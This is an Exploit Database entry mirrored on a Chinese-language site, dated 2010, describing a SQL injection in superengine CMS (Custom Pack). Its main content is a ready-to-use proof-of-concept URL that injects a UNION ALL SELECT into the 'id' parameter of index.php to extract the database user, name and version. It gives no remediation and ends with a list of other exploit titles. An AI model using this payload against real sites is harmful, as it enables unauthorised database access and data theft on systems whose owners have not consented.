superengine CMS (Custom Pack) – SQL Injection

Exploit Database
10 阅读

作者： 10n1z3d

日期： 2010-02-15
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/11456/

________|__|| ____________ ____ ____
_/ __ \\/ /|| \___ /_ \ /\_/ __ \ 
\___/\ /|||__/(<_> ) |\___/ 
 \___>\_/ |__|____/_____ \____/|___|/\___>
 \/ \/\/ \/ .org


Author: 10n1z3d <10n1z3d[at]w[dot]cn>
Date: 15/02/2010
---------------------------------------------------------
superengine CMS (Custom Pack) SQL Injection Vulnerability
---------------------------------------------------------
Vendor: http://superengine.ro/
Vuln:
http://[server]/index.php?mod=0&id=1[SQLI]

PoC:
http://[server]/index.php?mod=0&id=-1337+UNION+ALL+SELECT+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6
---------------------------------------------------------
Greetz to all evilzone.org members.

last Exploits
superengine CMS (Custom Pack) – SQL Injection的更多信息

Horde Groupware Webmail 3/4/5 – Multiple Remote Code Executions：
CMS snews – SQL Injection：
Netsweeper 2.6.29.8 – SQL Injection：
SuiteCRM 7.10.7 – ‘parentTab’ SQL Injection：
phpDolphin 2.0.5 – Multiple Vulnerabilities：
KosmosBlog 0.9.3 – SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery：
GitBucket 4.23.1 – Remote Code Execution：
Concrete5 CMS 5.7.3.1 – ‘Application::dispatch’ Method Local File Inclusion：